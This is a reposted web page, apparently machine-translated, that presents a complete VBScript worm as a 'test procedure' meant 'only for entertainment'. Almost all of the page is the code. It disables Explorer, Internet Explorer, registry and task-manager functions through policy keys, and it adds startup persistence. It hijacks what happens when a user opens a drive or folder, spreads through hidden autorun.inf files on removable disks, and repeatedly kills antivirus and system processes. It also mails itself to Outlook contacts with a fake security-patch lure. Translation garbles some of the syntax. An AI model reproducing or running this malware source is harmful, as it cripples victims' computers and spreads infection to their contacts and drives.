Vbs test procedure 1

Source: Internet
Author: User

Reprinted please indicate the source

A little malicious! Test with caution

'This procedure is written in sechaos, only for entertainment, not malicious communication, crack or rewrite. I am not liable, the final interpretation of all sechaos.
Dim FSO, wsh, myfile, WS, PP, fsofolder
Set wsh = wscript. Createobject ("wscript. Shell ")
Set FSO = wscript. Createobject ("scripting. FileSystemObject ")
Set myfile = FSO. GetFile (wscript. scriptfullname)
'To modify the Registry (Start Menu which things and the IE settings)
Wsh. regwrite "HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced \ Folder \ Hidden \ showall \ checkedvalue", 0, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Restrictions \ nobrowsercontextmenu", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Restrictions \ nobrowseroptions", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Restrictions \ nobrowsersaveas", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Restrictions \ nofileopen", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel \ Advanced", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel \ cache Internet", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel \ AutoConfig", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel \ Homepage", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel \ History", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel \ connwiz admin lock", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Internet Explorer \ main \ Start page", "http://www.cnblogs.com/Chaobs"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Internet Explorer \ main \ search page", "http://www.cnblogs.com/Chaobs"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Internet Explorer \ main \ default_page_url", "http://www.cnblogs.com/Chaobs"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Internet Explorer \ main \ default_search_url", "http://www.cnblogs.com/Chaobs"
Wsh. regwrite "HKEY_USERS \. Default \ Software \ Microsoft \ Internet Explorer \ main \ Start page", "http://www.cnblogs.com/Chaobs"
Wsh. regwrite "HKEY_USERS \. Default \ Software \ Microsoft \ Internet Explorer \ main \ default_page_url", "http://www.cnblogs.com/Chaobs"
Wsh. regwrite "HKEY_USERS \. Default \ Software \ Microsoft \ Internet Explorer \ main \ default_search_url", "http://www.cnblogs.com/Chaobs"
Wsh. regwrite "HKEY_USERS \. Default \ Software \ Microsoft \ Internet Explorer \ main \ search page", "http://www.cnblogs.com/Chaobs"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel \ Homepage", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel \ securitytab", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel \ resetwebsettings", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Restrictions \ noviewsource", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ infodelivery \ Restrictions \ noaddingsubscriptions", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nofilemenu", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ winoldapp \ norealmode", 1, "REG_DWORD"
Wsh. regwrite "HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ win32system", "C: \ nyboy. vbs"
Wsh. regwrite "HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ scanregistry ",""
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nologoff", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ norun", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nodesktop", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ noviewcontextmenu", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ notraycontextmenu", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ noclose", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ startmenulogoff", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nosmhelp", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nonethood", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nowinkeys", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nosetfolders", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ norecentdocsmenu", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nofind", "1", "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nowindowsupdate", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nosettaskbar", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nofavoritesmenu", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ norecentdocshistory", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System \ disableregistrytools", "1", "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ winoldapp \ disabled", 1, "REG_DWORD"
'The user can double-click on a hard disk, it can also be modified for so that it can not open file folder
Wsh. regwrite "HKLM \ SOFTWARE \ Classes \ drive \ shell \ auto \ command \", "C: \ nyboy. Bat '% 1 '"
Wsh. regwrite "hkcr \ drive \ shell \", "Auto"
Wsh. regwrite "hkcr \ drive \ shell \ auto \ command \", "C: \ nyboy. Bat '% 1 '"
Wsh. regwrite "HKLM \ SOFTWARE \ Classes \ directory \ shell \", "Auto"
Wsh. regwrite "hkcr \ directory \ shell \ auto \ command \", "C: \ nyboy. Bat '% 1 '"
Wsh. regwrite "HKLM \ SOFTWARE \ Classes \ directory \ shell \ auto \ command \", "C: \ nyboy. Bat '% 1 '"
'Modify default file icon
Wsh. regwrite "hkcr \ exefile \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "hkcr \ txtfile \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "hkcr \ dllfile \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "hkcr \ batfile \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "hkcr \ INIFILE \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "HKLM \ SOFTWARE \ Classes \ exefile \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "HKLM \ SOFTWARE \ Classes \ txtfile \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "HKLM \ SOFTWARE \ Classes \ dllfile \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "HKLM \ SOFTWARE \ Classes \ batfile \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "HKLM \ SOFTWARE \ Classes \ INIFILE \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "HKLM \ SOFTWARE \ Classes \. Reg \", "txtfile"
Wsh. regwrite "HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon \ legalnoticecaption", "Hello, chaobs and you have a joke"
Wsh. regwrite "HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon \ legalnoticetext"
'Copy itself to the C, D, E, F, U Disk
Myfile. Copy "C :\"
Myfile. Copy "D :\"
Myfile. Copy "E :\"
Myfile. Copy "F :\"
Myfile. Copy "I :\"
Myfile. Attributes = 34
'Define the autorun. inf content that is U disk virus must be part of the code
If FSO. fileexists ("C: \ autorun. inf") then
Set objfolder = FSO. GetFile ("C: \ autorun. inf ")
Else
Wsh. Run "CMD/C echo [Autorun]> C: \ autorun. inf "_
& "& Echo open = nyboy. Bat> C: \ autorun. inf "_
& "& Echo ShellExecute = nyboy. Bat> C: \ autorun. inf "_
& "& Echo Shell \ auto \ command = nyboy. Bat> C: \ autorun. inf "_
& "& Echo shell = auto> C: \ autorun. inf "_
& "& Attrib + H + S + R c: \ autorun. inf"
Set autobatc = FSO. createtextfile ("C: \ nyboy. Bat", 1, ture)
Autobatc. writeline ("nyboy. vbs ")
End if
If FSO. fileexists ("D: \ autorun. inf") then
Set objfolder = FSO. GetFile ("D: \ autorun. inf ")
Else
Wsh. Run "CMD/C echo [Autorun]> D: \ autorun. inf "_
& "& Echo open = nyboy. Bat> D: \ autorun. inf "_
& "& Echo ShellExecute = nyboy. Bat> D: \ autorun. inf "_
& "& Echo Shell \ auto \ command = nyboy. Bat> D: \ autorun. inf "_
& "& Echo shell = auto> D: \ autorun. inf "_
& "& Attrib + H + S + r d: \ autorun. inf"
Set autobatd = FSO. createtextfile ("D: \ nyboy. Bat", 1, ture)
Autobatd. writeline ("nyboy. vbs ")
End if
If FSO. fileexists ("E: \ autorun. inf") then
Set objfolder = FSO. GetFile ("E: \ autorun. inf ")
Else
Wsh. Run "CMD/C echo [Autorun]> E: \ autorun. inf "_
& "& Echo open = nyboy. Bat> E: \ autorun. inf "_
& "& Echo ShellExecute = nyboy. Bat> E: \ autorun. inf "_
& "& Echo Shell \ auto \ command = nyboy. Bat> E: \ autorun. inf "_
& "& Echo shell = auto> E: \ autorun. inf "_
& "& Attrib + H + S + r e: \ autorun. inf"
Set autobate = FSO. createtextfile ("E: \ nyboy. Bat", 1, ture)
Autobate. writeline ("nyboy. vbs ")
End if
If FSO. fileexists ("F: \ autorun. inf") then
Set objfolder = FSO. GetFile ("F: \ autorun. inf ")
Else
Wsh. Run "CMD/C echo [Autorun]> F: \ autorun. inf "_
& "& Echo open = nyboy. Bat> F: \ autorun. inf "_
& "& Echo ShellExecute = nyboy. Bat> F: \ autorun. inf "_
& "& Echo Shell \ auto \ command = nyboy. Bat> F: \ autorun. inf "_
& "& Echo shell = auto> F: \ autorun. inf "_
& "& Attrib + H + S + r f: \ autorun. inf"
Set autobatf = FSO. createtextfile ("F: \ nyboy. Bat", 1, ture)
Autobatf. writeline ("nyboy. vbs ")
End if
If FSO. fileexists ("I: \ autorun. inf") then
Set objfolder = FSO. GetFile ("I: \ autorun. inf ")
Else
Wsh. Run "CMD/C echo [Autorun]> I: \ autorun. inf "_
& "& Echo open = nyboy. Bat> I: \ autorun. inf "_
& "& Echo ShellExecute = nyboy. Bat> I: \ autorun. inf "_
& "& Echo Shell \ auto \ command = nyboy. Bat> I: \ autorun. inf "_
& "& Echo shell = auto> I: \ autorun. inf "_
& "& Attrib + H + S + r I: \ autorun. inf"
Set autobatf = FSO. createtextfile ("I: \ nyboy. Bat", 1, ture)
Autobatf. writeline ("nyboy. vbs ")
End if
'Set attributes for the system read only hidden virus body
Wsh. Run "CMD/C attrib + H + S + R c: \ nyboy. Bat "_
& "& Attrib + H + S + r d: \ nyboy. Bat "_
& "& Attrib + H + S + r e: \ nyboy. Bat "_
& "& Attrib + H + S + r f: \ nyboy. Bat "_
& "& Attrib + H + S + r I: \ nyboy. Bat"
'Mandatory end of certain processes, such as QQ, notepad, webpage, batch file, carbachol, realplay process, after running to open these files
Do
Set Ws = GetObject ("winmgmts: \. \ Root \ cimv2 ")
Set pp1_ws.exe cquery ("select * From win32_process where name1_'taskmgr.exe 'or name = 'qq.exe' or name = 'notepad.exe 'or name = 'ipolice.exe' or name = 'cmd.exe 'or name = 'avp.exe' or name = 'winrar.exe 'or name = 'realplay.exe' or name = 'winword.exe '")
For each I in PP
I. Terminate ()
Wscript. Sleep 100
Next
Loop
'The virus can be spread by mail
Set OL = Createobject ("Outlook. application ")
On Error resume next
For x = 1 to 5
Set mail = ol. createitem (0)
Mail. To = ol. getnamespace ("mapi"). addresslists (1). addressentries (X)
Mail. Subject = " virus test"
Mail. Body = "Dear user, in order to better serve users and enhance the virus prevention capability by this patch is specially released. Details can be found on the official website. For specific tests, please follow the attachment. You may need to disable or prevent the old version from running for online upgrade. Thank you for your cooperation at the R & D center"
Mail. attachments. Add ("C: \ nyboy. vbs ")
Mail. Send
Next
Ol. Quit

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.